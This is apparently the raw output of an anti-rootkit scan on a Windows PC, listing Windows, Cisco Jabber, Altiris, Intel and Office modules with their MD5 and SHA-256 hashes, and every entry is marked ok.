15:34:01.0416 0x04bc  [ 1CBF15FDB0310345A68972EB5C5B948F, E1EDCE6216B24037B243AC68CEEBD510646B2EFD70BC118E68303F9ED85D1973 ] C:\Windows\SysWOW64\mssprxy.dll
15:34:01.0416 0x04bc  C:\Windows\SysWOW64\mssprxy.dll - ok
15:34:01.0418 0x04bc  [ 8130391F82D52D36C0441F714136957F, 1FD4FEE7CAF63E450F27729E07EA2A2F09288629FD872DBB6E8710B16D8DBD5D ] C:\Windows\System32\imapi2.dll
15:34:01.0418 0x04bc  C:\Windows\System32\imapi2.dll - ok
15:34:01.0420 0x04bc  [ E859F50707C775A737DC5C08D9E93E03, F95A5977BEC4B2CF45972712433CC87DC8F65200905236776F7786C2D73D54F7 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\35d3a1b878542de59cb4fc0593992404\System.ServiceModel.Internals.ni.dll
15:34:01.0420 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\35d3a1b878542de59cb4fc0593992404\System.ServiceModel.Internals.ni.dll - ok
15:34:01.0423 0x04bc  [ 6A5C1A8AC0B572679361026D0E900420, B5E693B48B462E97738A3D4E58B60846159649EB15F4D11074B4BC107CC88562 ] C:\Windows\System32\hgcpl.dll
15:34:01.0423 0x04bc  C:\Windows\System32\hgcpl.dll - ok
15:34:01.0425 0x04bc  [ 2C6A378BEA45CBA17799352C0111F890, A889EDE82626985AF84E4702F61DAD99F2E72DBD0E0160E6763683BE33ED6B20 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\7f372539d1837d70e88821cc20ed6530\System.Net.Http.ni.dll
15:34:01.0425 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\7f372539d1837d70e88821cc20ed6530\System.Net.Http.ni.dll - ok
15:34:01.0427 0x04bc  [ 21F82D80FC4551A502123C4B2CA1C9C1, DAA94692D5EC230842DA32039DFB3E46BD1778B9ED7F0DC8A44338D3471FF3C7 ] C:\PROGRA~2\MICROS~1\Office14\MAPIPH.DLL
15:34:01.0427 0x04bc  C:\PROGRA~2\MICROS~1\Office14\MAPIPH.DLL - ok
15:34:01.0429 0x04bc  [ 6F8BEC6CF2E2576897FE22D5D88D2135, 742B0051E8A3CC1BB0295CD688C9340CD1366C2A703121B496DFA64F6C0855DD ] C:\PROGRA~2\MICROS~1\Office14\OLMAPI32.DLL
15:34:01.0429 0x04bc  C:\PROGRA~2\MICROS~1\Office14\OLMAPI32.DLL - ok
15:34:01.0431 0x04bc  [ 885AAA475DDAFDF708BA3A2DD67F9E2B, 6A3DBE8ACA0919BDAF875B2430AF5760A0AE7C08B4194D267DDDD19662805002 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CSFIdm.dll
15:34:01.0431 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CSFIdm.dll - ok
15:34:01.0434 0x04bc  [ 4DC99A02E74BB5206FCAD2F2F0F5AD1A, 5A4CF404DF9AA8617469933478C1B4B0FD0C58871361C8F78251E040CAB8836A ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\CallsTab\CallsTab.dll
15:34:01.0434 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\CallsTab\CallsTab.dll - ok
15:34:01.0436 0x04bc  [ B65351C9EB5EBB7E5D7B604D4A7292AA, A25578DCB29D18EB21ADBA80E41173DA824C8ABDB4D33508169EC011B7552B43 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\StatusTab\StatusTab.dll
15:34:01.0436 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\StatusTab\StatusTab.dll - ok
15:34:01.0438 0x04bc  [ 461DF0305944DD33AE61FC2B45B4D342, D36AA8E24DBF2069C6EA92764F04CC1508996FA4407D374311B739E681DA54EC ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\LoginMgr.dll
15:34:01.0438 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\LoginMgr.dll - ok
15:34:01.0440 0x04bc  [ 32D759CE031ADED4B83A56659B7761AF, 4D5FF9731A6681E8E87669869231A220C11CB5334190B31FB7BAEFE47DD0A76F ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\utiltp.dll
15:34:01.0440 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\utiltp.dll - ok
15:34:01.0442 0x04bc  [ 217843B191273055093A1889A66D9890, F2206DDD7C2DAECD083171EF9E625211279EB2795F602FBC858F84D5D48E8C5C ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\conhelp.dll
15:34:01.0442 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\conhelp.dll - ok
15:34:01.0444 0x04bc  [ 4C60F3BC69A577F392A9B2EE32C16930, 0C2D3B6604C2851B05710EA8269D62DF8247B9B1DB0270137714684A1EA0B04E ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\ExpatWrapper.dll
15:34:01.0444 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\ExpatWrapper.dll - ok
15:34:01.0446 0x04bc  [ 75193832E9C7703356A5FC3CA67BAB4A, DF9AF8B8FAC03470ACC66C8BC6EA02722D074ED652A35BC8DA86171EC65C84EA ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libexpatw.dll
15:34:01.0446 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libexpatw.dll - ok
15:34:01.0448 0x04bc  [ B454595A690689A3407233DE1AE62389, 298E64884234FCDF2E4634AC56B5EF66BFC85EABB8AFC6A758455E1D85123480 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\cmcrypto.dll
15:34:01.0448 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\cmcrypto.dll - ok
15:34:01.0450 0x04bc  [ D546D59B8786D419C1CE7965256AC62A, 278455726780DFBA5192F9D1A6C5475F16D19A2B611C919234EEC7E4804D8A10 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\conhttp.dll
15:34:01.0450 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\conhttp.dll - ok
15:34:01.0452 0x04bc  [ 4631198A0DDFA54BE01AD4630D53E171, FBB4882E7A131DED25F945338E1544462289FBFFE0252BB072050812CA5F308D ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\NetworkMonitor.dll
15:34:01.0452 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\NetworkMonitor.dll - ok
15:34:01.0454 0x04bc  [ 8FF5C51B44F87D2E8C5D14EA86EC8F22, AD3F81C8F5B3129BDF6D13B6EF5ECA4D8A2BA58DED124F5F1EB4509ADAB8D3E4 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\SoundTab\SoundTab.dll
15:34:01.0454 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\SoundTab\SoundTab.dll - ok
15:34:01.0456 0x04bc  [ 3BBC6CEBFF2E7AD117313C01C6359CA4, F115116B215C32BFDE4D467D7B4FD4695709C10C0DB7CD5EA0326041BF3FFA63 ] C:\Users\boylem1\AppData\Local\NEC\UC700\amscore.dll
15:34:01.0456 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\amscore.dll - ok
15:34:01.0458 0x04bc  [ 9FB86BF6C9530DD84580374114EBD38E, 14E37B1BD01BCAF8F1262936B3AA4020651C8D97439E326BE416E6AB4584699E ] C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSO.DLL
15:34:01.0458 0x04bc  C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSO.DLL - ok
15:34:01.0460 0x04bc  [ 798D5051EC5070BAFD2EE4903E31A09E, 185AEDB9C579EA4EA45DE0469252C7C41179C929C257072BE7004CC4F5EC982B ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\XmppMgr.dll
15:34:01.0460 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\XmppMgr.dll - ok
15:34:01.0462 0x04bc  [ 044EA0C4E8351DC0BA8CA2BF272EE4DB, 840F5264E33C9CFE91C5D690F3D05B19041D49793E353ECFB556824D99E97335 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\XmppSDK.dll
15:34:01.0462 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\XmppSDK.dll - ok
15:34:01.0464 0x04bc  [ 828185688FDAAE6C7959B884ABED1766, 98A1F5DFDD517CDC7C20F0F64137D2A796E6E25EB82F7128F01B5DBCFF4C6587 ] C:\Windows\SysWOW64\schannel.dll
15:34:01.0464 0x04bc  C:\Windows\SysWOW64\schannel.dll - ok
15:34:01.0466 0x04bc  [ D18B77B65185DC54D334BC7CFDC72EA1, 7831813CC794F11B851820FCF34310F445875BE48011AC62257C14A54F69AF7C ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\SSLGatewayClientSession.dll
15:34:01.0466 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\SSLGatewayClientSession.dll - ok
15:34:01.0468 0x04bc  [ 42E11424DCD373E6D9C8F7C8AF438153, 92B6B17CD8492AAE6C6ED6EE2DCF44FD11F017A155D4DB80B11EADD11994DD95 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\commonsession.dll
15:34:01.0468 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\commonsession.dll - ok
15:34:01.0469 0x04bc  [ 63A4D2FCBBBA5015DE1ED4E63B073741, 9B5B20C9F857AF0E4072C17F920BB97C4EC4B434A66E95EB7467AACBF3578A5B ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\ConfigInfo.dll
15:34:01.0470 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\ConfigInfo.dll - ok
15:34:01.0471 0x04bc  [ 61B1ED5F429EFAC7E2036769870AB93E, 628CF28434C5DFB81B76B90BEA4CDD9EB1E4B0971BEE24136A09490F9439E00E ] C:\Windows\SysWOW64\certcli.dll
15:34:01.0471 0x04bc  C:\Windows\SysWOW64\certcli.dll - ok
15:34:01.0473 0x04bc  [ 2F040CF0613A6D64DCBBA9EE81F5A5AE, DA16117429AF47230CD7C136407C81951B8D2E45A8B7A9DC6948407AA2EC4ADD ] C:\Windows\SysWOW64\dsrole.dll
15:34:01.0474 0x04bc  C:\Windows\SysWOW64\dsrole.dll - ok
15:34:01.0476 0x04bc  [ 1804D2F4F77BA015DAABFCBA21F2CD48, EDB3C56CFE5EA1754FF8B3682E99AC4E6D5FE0073B570BE42A3193C1A5B3423E ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\WapiClient.dll
15:34:01.0476 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\WapiClient.dll - ok
15:34:01.0477 0x04bc  [ 1B85FA0D0A93C011B76678733F39DB6C, 46B177B723C417B150A4EE2503CB94B9212A99E0CBCA54D77CBBB8A147DF2BEB ] C:\Windows\SysWOW64\kerberos.dll
15:34:01.0478 0x04bc  C:\Windows\SysWOW64\kerberos.dll - ok
15:34:01.0480 0x04bc  [ FE9AFB91571A19899B81EF9F27F36C63, 8F47E896B9AEF5AF94E5DDBD0C0B6EAAC8E037128DCAFFB34039DFA2729D4701 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\PrivacyTab\PrivacyTab.dll
15:34:01.0480 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\PrivacyTab\PrivacyTab.dll - ok
15:34:01.0482 0x04bc  [ 30AEF2585DEE11C4C86FE55CEB82BFAD, A436EC802D2CEA46ED5B43E7509EFA8E2E5B1C0948662196BA3A9678B4892583 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\AccountsTab\AccountsTab.dll
15:34:01.0482 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\AccountsTab\AccountsTab.dll - ok
15:34:01.0484 0x04bc  [ 1128637CAD49A8E3C8B5FA5D0A061525, 6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278 ] C:\Windows\SysWOW64\cryptdll.dll
15:34:01.0484 0x04bc  C:\Windows\SysWOW64\cryptdll.dll - ok
15:34:01.0487 0x04bc  [ D268523B6C0B118777D5782CCDAEACD7, BD37FFE7352222F65EE228BB8B6B65E8A02B2E23F3C4245A89104BD20CF127CC ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\SelfCareTab\SelfCareTab.dll
15:34:01.0487 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\SelfCareTab\SelfCareTab.dll - ok
15:34:01.0490 0x04bc  [ 3552CC0D2464EF963EEE8A67A7B7CEB3, C9A1A040041FFB59D1D27D741A0C27040AAED19C0E87C7514A453F4AD0886E15 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\CallHistoryPlugin\CallHistoryPlugin.dll
15:34:01.0490 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\CallHistoryPlugin\CallHistoryPlugin.dll - ok
15:34:01.0492 0x04bc  [ 347C7BA22399AF6E35BB2E802FE978E6, 28C9A5DF08F546C21717E242EE9B69066A8D4FD80E2C145D5B392F6EFC17E854 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\CommunicationHistoryService\CommunicationHistoryService.dll
15:34:01.0492 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\CommunicationHistoryService\CommunicationHistoryService.dll - ok
15:34:01.0495 0x04bc  [ C9D6487FECEAE4589688E9B57A99A936, 2AC1775B1BC0CE675D9741FB0DD0CE7883E9864ED432716EA21059B6C89E84ED ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\HuntGroupCallPickupPlugin\HuntGroupCallPickupPlugin.dll
15:34:01.0495 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\HuntGroupCallPickupPlugin\HuntGroupCallPickupPlugin.dll - ok
15:34:01.0498 0x04bc  [ CAC8BD1DE9BE14B5841311FD08A0A8D0, 5C6DA81212654C5CC343D5660AA5C5DD5F3B082D1127215EB3A3F533FD56D3DB ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\Click2XPlugin\Click2XPlugin.dll
15:34:01.0498 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\Click2XPlugin\Click2XPlugin.dll - ok
15:34:01.0500 0x04bc  [ 47126118BEF8C19258D763539A84DD19, EEB3506D83E409BD7E6C857E4DF34A9A85E146637E78FBDC5AE0AEB8BA9E597C ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CUCExtensionProvider.dll
15:34:01.0500 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CUCExtensionProvider.dll - ok
15:34:01.0505 0x04bc  [ 272AB1EBE0A59E690558475B1F7B8125, E33F4322BD9E7D3F316102A0A8A25843F7B0709154A6AB6AE3949E9BEC250A79 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CUCMessenger.dll
15:34:01.0505 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CUCMessenger.dll - ok
15:34:01.0508 0x04bc  [ DFAB13D373100AA559E9B836E3A49D0D, AA2FD8D4BE12DFBE485F389A852C0DBD531B98B9774BF40A57EF1F12C1B914C5 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\WbxAudioConferencePlugin\WbxAudioConferencePlugin.dll
15:34:01.0508 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\WbxAudioConferencePlugin\WbxAudioConferencePlugin.dll - ok
15:34:01.0510 0x04bc  [ CC29FA55E4CC828E0ECA67CF85EB6CFE, 14703C3E681EA5674FDCDEA82A100B221C03B1EACDB8E6F9490B8CFB6497B0BB ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\JabberMeetingPlugin\JabberMeetingPlugin.dll
15:34:01.0510 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\JabberMeetingPlugin\JabberMeetingPlugin.dll - ok
15:34:01.0512 0x04bc  [ 7115D7D50E7F6120D68A15FA8D562921, 2A73C3CC8B0BE5041941D8107C2F89657FDA40C6833035F8B13852918818966C ] C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe
15:34:01.0512 0x04bc  C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe - ok
15:34:01.0514 0x04bc  [ 80E901FE726A6F164C61CA2BE29D1A81, 599C76DD09B814B9F962C15A36BBD3488DD95A2471547A21210D237CCAF09CFF ] C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\999c07bd5f49f4ec74209078b5ab6f61\System.Speech.ni.dll
15:34:01.0514 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\999c07bd5f49f4ec74209078b5ab6f61\System.Speech.ni.dll - ok
15:34:01.0516 0x04bc  [ 88A516868699E5B801E988BDC9B9C980, B658F738CB2DDFABB201895908E0C4C1646431AA8CF0AECF3B042E4BF8DCED1C ] C:\Program Files\Altiris\Altiris Agent\AeXAgentExt.dll
15:34:01.0516 0x04bc  C:\Program Files\Altiris\Altiris Agent\AeXAgentExt.dll - ok
15:34:01.0518 0x04bc  [ 6C4B2E1A25841077084EB9F76FF6FFA7, 777D9E5D81409A54BF387BDDF4E471932FFB636406E390EC29EDF1FFFE3D8880 ] C:\Windows\SysWOW64\wmp.dll
15:34:01.0518 0x04bc  C:\Windows\SysWOW64\wmp.dll - ok
15:34:01.0520 0x04bc  [ B466EC20044C13DF479740DBAE5CD278, BD6F8DAA699632716E2C8FE3D58C83E334D1EF5F925E27201F0F4C3708833C4F ] C:\Program Files\Altiris\Altiris Agent\AeXNetMon.dll
15:34:01.0520 0x04bc  C:\Program Files\Altiris\Altiris Agent\AeXNetMon.dll - ok
15:34:01.0522 0x04bc  [ B837D1528CE2E3CB79F09496BC08DDC6, ACD54CE61CFE94F23DC283537AD8FFBEB3D6041BD30317B60BA7A10FCB240A27 ] C:\Windows\System32\SensApi.dll
15:34:01.0522 0x04bc  C:\Windows\System32\SensApi.dll - ok
15:34:01.0524 0x04bc  [ 02DF0628BE8B64B84D50FBE53549AA3B, AED50B07451F14D0C0682EDDC11ED5BBAD63D6DB11A91826B0ADBDBE411F0084 ] C:\Windows\SysWOW64\wmploc.DLL
15:34:01.0524 0x04bc  C:\Windows\SysWOW64\wmploc.DLL - ok
15:34:01.0526 0x04bc  [ 597363295FCDD034C9A078D1A051EB8B, 0DAC88BA8DD73181FCC5700A2D879E0D17ECE772627215E65AA67CB77B11FA9D ] C:\Program Files\Common Files\Altiris\AeXNetComms.dll
15:34:01.0526 0x04bc  C:\Program Files\Common Files\Altiris\AeXNetComms.dll - ok
15:34:01.0528 0x04bc  [ DB62939772107D79D3A9F0411FE0C27C, 25B3225018413D6F4604F3A512FA54082FFB3DB56ED9FFA8C2C57C5949924A68 ] C:\Program Files\Altiris\Altiris Agent\AeXAgentUI.dll
15:34:01.0528 0x04bc  C:\Program Files\Altiris\Altiris Agent\AeXAgentUI.dll - ok
15:34:01.0530 0x04bc  [ 57197B7509DA3DF8BDDEAE9A60F5272A, C6F5D9668C476EDBAD525EEE76A3E97879A226D4BE348EA89512520DA43111A7 ] C:\Program Files\Altiris\Altiris Agent\AeXTaskSchedulerLib.dll
15:34:01.0530 0x04bc  C:\Program Files\Altiris\Altiris Agent\AeXTaskSchedulerLib.dll - ok
15:34:01.0532 0x04bc  [ D7E7031923962D05CDCD4F770585D86B, CD1840680649F861660F0E10478A854264AF4DDF93C55892BB82705F602E41F2 ] C:\Program Files\Altiris\Altiris Agent\AgentScheduler.dll
15:34:01.0532 0x04bc  C:\Program Files\Altiris\Altiris Agent\AgentScheduler.dll - ok
15:34:01.0534 0x04bc  [ 0654A3FB2EB1BB5431A54E35C599FEE0, 817815F6C8C1644AC25FB6CB558D4CB9BA3D9549263C7C2662C98F6D1D5D4B14 ] C:\Program Files\Altiris\Altiris Agent\AeXBasicInventory.dll
15:34:01.0534 0x04bc  C:\Program Files\Altiris\Altiris Agent\AeXBasicInventory.dll - ok
15:34:01.0536 0x04bc  [ 1A875ED4FAE3FE4945F4C59657B67628, 44C5E427D62BF8A9439650DABD1D67E92AF0C1F7BB18D90B44B8E1FD614F9B91 ] C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\SMFAgent.dll
15:34:01.0536 0x04bc  C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\SMFAgent.dll - ok
15:34:01.0538 0x04bc  [ AC3E11C9FF06699269568648AA543F21, 72F73210C9F225A30A9F198E4D7CACC71172CB5770C1C7087F0E684399476579 ] C:\Program Files\Altiris\Altiris Agent\x86\AeXNSAgentHostSurrogate32.exe
15:34:01.0538 0x04bc  C:\Program Files\Altiris\Altiris Agent\x86\AeXNSAgentHostSurrogate32.exe - ok
15:34:01.0540 0x04bc  [ 8469E92731C94A6441F9E2C0D997B5C2, B9FB4D607C7724C62204061295E89E8FFF1751338A693DAD4953678BA4E9324B ] C:\Program Files (x86)\Altiris\Altiris Agent\Agents\Application Metering Agent\AMAgent.dll
15:34:01.0540 0x04bc  C:\Program Files (x86)\Altiris\Altiris Agent\Agents\Application Metering Agent\AMAgent.dll - ok
15:34:01.0542 0x04bc  [ 14D19B0A02154DE49739AA52EC9F0B77, 7AD79FAB054FFC3DFB9A1B44CABC5C0D6AF098846A2C4D3E6966617D18B9356F ] C:\Program Files\Altiris\Altiris Agent\Agents\Client Task Agent\Client Task Agent.dll
15:34:01.0542 0x04bc  C:\Program Files\Altiris\Altiris Agent\Agents\Client Task Agent\Client Task Agent.dll - ok
15:34:01.0544 0x04bc  [ F53697C98846234F2E871AB493128336, 7FD53D39ED483D8BE59259EE27846AE60866102051D987213FD0A2FBFB7B366F ] C:\Program Files (x86)\Altiris\Altiris Agent\Agents\Inventory Agent\InvAgent.dll
15:34:01.0544 0x04bc  C:\Program Files (x86)\Altiris\Altiris Agent\Agents\Inventory Agent\InvAgent.dll - ok
15:34:01.0546 0x04bc  [ E9B7BBE88E49C1C22E403CDA61E3BD79, D0186FBA65F145D0066A4FBA7F1BFB5AD0EABB3AB47E381BC76DCC56A2940D68 ] C:\Program Files\Altiris\Altiris Agent\Agents\Inventory Rule Agent\InventoryRuleAgent.dll
15:34:01.0546 0x04bc  C:\Program Files\Altiris\Altiris Agent\Agents\Inventory Rule Agent\InventoryRuleAgent.dll - ok
15:34:01.0548 0x04bc  [ 0AAC51141503BCAE1CAF0BB552C1128D, 551E9E4F6142DF2BAC25C7509552E28B1FCD355061A5B1B2F815835855DADAC9 ] C:\Program Files\Altiris\Altiris Agent\Agents\Software Management Solution Plugin\SoftwareManagementSolution_Agent.dll
15:34:01.0548 0x04bc  C:\Program Files\Altiris\Altiris Agent\Agents\Software Management Solution Plugin\SoftwareManagementSolution_Agent.dll - ok
15:34:01.0550 0x04bc  [ B581F630DBCF6C1126C8C6193895CEDE, 44071F32339B8319EF008F3954790061C6E836C714C8C064E462340C7F2684C0 ] C:\Program Files\Altiris\Altiris Agent\Agents\PatchMgmtAgent\PatchMgmtAgents.dll
15:34:01.0550 0x04bc  C:\Program Files\Altiris\Altiris Agent\Agents\PatchMgmtAgent\PatchMgmtAgents.dll - ok
15:34:01.0552 0x04bc  [ C3CD3250B57066F2BDC37D29DA7B996B, E4A125711D429728F54EF7109F7A8E8B3A6502B4D81EB7245A93E612B69F420E ] C:\Program Files\Common Files\Altiris\AeXPackageDelivery.dll
15:34:01.0552 0x04bc  C:\Program Files\Common Files\Altiris\AeXPackageDelivery.dll - ok
15:34:01.0554 0x04bc  [ 595E22819FDC41CBC090AB835CC11B98, 3A33C01CC1119472515B61A2837BC138A522562E9B0B6BF9B4386D8EAF1A2594 ] C:\Windows\SysWOW64\AeXSystemPerformance.dll
15:34:01.0554 0x04bc  C:\Windows\SysWOW64\AeXSystemPerformance.dll - ok
15:34:01.0556 0x04bc  [ 130632E8ACDE0AA0E4BC419C6F81AD27, F3E628A31EDB057CE5168CA6B1A498BF05D07BDE0A7E240635E129B9C6E11168 ] C:\Program Files\Altiris\Altiris Agent\AeXAgentUIHost.exe
15:34:01.0556 0x04bc  C:\Program Files\Altiris\Altiris Agent\AeXAgentUIHost.exe - ok
15:34:01.0558 0x04bc  [ 7D4B9A48430ED57ACA6373B71D5904CA, 6ED72DAA7A4951142F036364E8F237E74246EF3E9EA089448DEF15380DAB0DB3 ] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
15:34:01.0558 0x04bc  C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe - ok
15:34:01.0560 0x04bc  [ E70FD0D2C95F559A17321D831875593D, 57839ADA7CC6606D98B43FC2F4EC6F5E9B75A2F3EC937C11322201128A161E0D ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
15:34:01.0560 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe - ok
15:34:01.0562 0x04bc  [ C485FB802F6C4A306B8F89BA087E5CA2, DE2E0F4A22D63EC54E23491962282ED3B01C7EB9941774A0C5633A776EAD499A ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
15:34:01.0562 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe - ok
15:34:01.0564 0x04bc  [ 4DF841632B62A7CF19A79A05046A8AB1, D80F28FD7FEB95DB83976EAFECB2E9AE1423DA4D34EC5D820FC39A33444B82DA ] C:\Windows\System32\wbem\WmiApSrv.exe
15:34:01.0564 0x04bc  C:\Windows\System32\wbem\WmiApSrv.exe - ok
15:34:01.0566 0x04bc  [ D74329A9304738A9F5D77B8373122C00, 604D519D7BCB78337ECB5AFD66158B29139318589B23F3B92F7888026F1911EB ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe
15:34:01.0566 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe - ok
15:34:01.0568 0x04bc  [ 8FBABFE8D16B9548656F4C06F4E1C95D, BCCFE1D5CD5412AC0DE6DB7A8BFF6444A74A5BACDF34B3D6B520D767050C3922 ] C:\Users\boylem1\Desktop\RogueKillerX64.exe
15:34:01.0568 0x04bc  C:\Users\boylem1\Desktop\RogueKillerX64.exe - ok
15:34:01.0570 0x04bc  [ D9E21CBF9E6A87847AFFD39EA3FA28EE, B2AE0BBF907D4108DE3485E6059DF8D10C39707CD508A55A2D9627A66D01AE78 ] C:\Windows\System32\SearchProtocolHost.exe
15:34:01.0570 0x04bc  C:\Windows\System32\SearchProtocolHost.exe - ok
15:34:01.0571 0x04bc  [ 773212B2AAA24C1E31F10246B15B276C, F2EF85F5ABA307976D9C649D710B408952089458DDE97D4DEF321DF14E46A046 ] C:\Windows\servicing\TrustedInstaller.exe
15:34:01.0571 0x04bc  C:\Windows\servicing\TrustedInstaller.exe - ok
15:34:01.0573 0x04bc  [ 850BD2D2D9CB5894935C3B6333CAD6FD, AB1EE5FD5E2F1CC927C3EA92E71C91ACA566E69622D47AE780DA391B7C30DDD6 ] C:\Windows\System32\riched20.dll
15:34:01.0573 0x04bc  C:\Windows\System32\riched20.dll - ok
15:34:01.0575 0x04bc  [ 1F4EDCBD713AD155D39C2242D4E8BC24, 61E34FBB3ABC3BE43DBD3EC95CC1799A1DD17F825F31B601BA59312E2DFE51DD ] C:\Program Files (x86)\Common Files\Altiris\AeXNSEvent.dll
15:34:01.0575 0x04bc  C:\Program Files (x86)\Common Files\Altiris\AeXNSEvent.dll - ok
15:34:01.0577 0x04bc  [ E87213F37A13E2B54391E40934F071D0, 7EB221127EFB5BF158FB03D18EFDA2C55FB6CE3D1A1FE69C01D70DBED02C87E5 ] C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
15:34:01.0577 0x04bc  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe - ok
15:34:01.0579 0x04bc  [ 4AEDAB50F83580D0B4D6CF78191F92AA, D113C47013B018B45161911B96E93AF96A2F3B34FA47061BF6E7A71FBA03194A ] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
15:34:01.0579 0x04bc  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe - ok
15:34:01.0581 0x04bc  [ 81FB155132AE12BA18119D5B36A85476, B135C87752B20C98CD5D4B9BE47316F785EC41FD5E391D8609F06EDA29B05BBF ] C:\Windows\System32\msvcr110_clr0400.dll
15:34:01.0581 0x04bc  C:\Windows\System32\msvcr110_clr0400.dll - ok
15:34:01.0583 0x04bc  [ 9E4FA017C8D51AC87E25C0BA8A669DCC, FD4ED5098D25FF7A3D8C064B3883FBB0875D9689058D94464B64A37963AA4D55 ] C:\Program Files (x86)\Google\Update\1.3.25.5\goopdateres_en.dll
15:34:01.0583 0x04bc  C:\Program Files (x86)\Google\Update\1.3.25.5\goopdateres_en.dll - ok
15:34:01.0585 0x04bc  [ D4A6547DF01A88FECBAAC7C987E0E201, 1457C9DF8019DAB0438C79A460EADAB5EE340BB778D1AD4B9B7A5037554FB35C ] C:\Windows\assembly\NativeImages_v2.0.50727_32\System.ServiceProce#\a229c5bed4a12b5db6ca55d223ada6df\System.ServiceProcess.ni.dll
15:34:01.0586 0x04bc  C:\Windows\assembly\NativeImages_v2.0.50727_32\System.ServiceProce#\a229c5bed4a12b5db6ca55d223ada6df\System.ServiceProcess.ni.dll - ok
